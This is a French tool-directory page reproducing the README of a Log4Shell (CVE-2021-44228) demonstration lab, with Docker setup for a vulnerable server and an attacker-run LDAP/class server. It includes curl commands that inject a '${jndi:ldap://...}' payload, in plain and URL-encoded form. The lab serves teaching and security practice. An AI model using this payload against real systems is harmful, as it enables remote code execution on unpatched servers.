Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4Shell-demo — Démo pour montrer comment fonctionne la vulnérabilité Log4Shell / CVE-2021-44228 | Kitploit
Outils/GitHubGitHub/mschmnet/log4shell-demo
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubmschmnet/log4shell-demo

Log4Shell-demo

Démo pour montrer comment fonctionne la vulnérabilité Log4Shell / CVE-2021-44228

Voir le dépôt
71il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4Shell en action

Ce projet vise à démontrer le fonctionnement de la vulnérabilité Log4Shell / CVE-2021-44228.

Prérequis

Vous avez seulement besoin d'avoir Docker installé. Idéalement, vous disposez de deux machines virtuelles différentes. Une pour le serveur vulnérable et une pour le serveur malveillant qui hébergera la base de code malveillante et un serveur LDAP.

Optionnellement, vous pouvez avoir Make et Docker Compose installés mais ce n'est pas nécessaire car ce dépôt contient également un make.sh pour contourner ces prérequis et les utiliser depuis un conteneur Docker.

Installer Docker (optionnellement)

Si ce n'est pas déjà fait, voici les étapes pour installer Docker sur une VM Debian. Vous pouvez utiliser ces étapes : https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46

Télécharger le dépôt

root@kitploit:~
git clone [email protected]:mschmnet/Log4Shell-demo.git 

Installer le serveur vulnérable

root@kitploit:~
cd vulnerable-server
../make.sh run # Or you coud execute make run if you hade Make and Docker Compose installed

Démarrer le serveur malveillant

Cela démarrera un serveur LDAP de base et un serveur Python de base pour servir les classes Java malveillantes.

Vous devez fournir l'adresse IP ou le nom de domaine où ces serveurs seront disponibles

root@kitploit:~
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally make instead of ../make.sh if you had Make and Docker Compose installed

Comment attaquer le serveur cible

root@kitploit:~
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint

ou juste

root@kitploit:~
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'

où ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a} est simplement encodé en URL

Comment arrêter l'un d'eux

root@kitploit:~
../make.sh stop

Comment afficher les logs

root@kitploit:~
../make.sh logs 

Slides

https://raw.githubusercontent.com/mschmnet/Log4Shell-demo/main/pdf/slides.pdf

Télécharger l’outil